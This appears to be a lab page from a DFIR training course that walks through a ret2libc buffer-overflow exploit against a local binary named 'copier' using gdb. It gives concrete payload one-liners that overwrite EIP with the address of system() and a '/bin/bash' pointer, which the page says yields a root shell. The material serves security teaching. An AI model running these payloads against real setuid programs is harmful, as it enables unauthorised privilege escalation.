RE+DFIR101 - Malware Analysis Short Stories


  ____  _____ _____ ____  ______   ______  
 |  _ \| ____|_   _|___ \/ ___\ \ / / ___| 
 | |_) |  _|   | |   __) \___ \\ V /\___ \ 
 |  _ <| |___  | |  / __/ ___) || |  ___) |
 |_| \_\_____| |_| |_____|____/ |_| |____/ 
                                           
                                                     
DFIR101 - Exploit2Forensics		
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

EXPLOIT DEVELOPMENT

Please open a shell to begin the steps that follow:

1. Open copier in gdb: "gdb ./copier"

2. Set a breakpoint on main with "break main"

3. Run the program with a "r"

4. Start looking for SHELL=/bin/bash in your environmental variables by increasing the number behind the + by one. " x/s *((char **)environ+1)"

5. Add 6 to the address printed on left "0xFFFFFFFF: "SHELL=/bin/bash""

5. Check if your math is correct by attempting to read the address and look for "/bin/bash" with the command "x/s 0xFFFFFFFF"

6. Get the address of System. "p system"

7. Lets validate that we have control of eip by checking if our value of "ABAB" is printed during segmentation fault which should appear as "0x42414241 in ??()". Type this "r $(python -c 'print "\x90"*112 + "ABAB"')

8. If we do not get the result in the prior step adjust the value after the "*" up or down. You would go up if you are seeing "\x90" in your segmentation fault. If you see anything other then "0x42414241" adjust upwards.

9. Now we have 3 important pieces of information. The address of System, string of /bin/bash, and the exact offset to control eip.

10. Type "r $(python -c 'print "A"*112+"SYSTEMADDRESSGOESHEREBACKWARDS"+"BBBB"+"STRINGOFBASHGOESHEREBACKWARES"'). An example of your address was 0xF7E44940 for system and 0xFFFFd8a1 for string of /bin/bash your exploit would be "r $(python -c 'print "A"*112+"\x40\x49\xe4\xf7"+"BBBB"+"\xa1\xd8\xff\xff"')"

11. If you drop into a non-root shell execute "./copier $(python -c 'print "A"*112+"\x40\x49\xe4\xf7"+"BBBB"+"\xca\xd3\xff\xff"')"

12. You are now root...check the running environment as root with a "ps -aex --forest"

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HOME × GITHUB × YOUTUBE × LINKEDIN × BLOG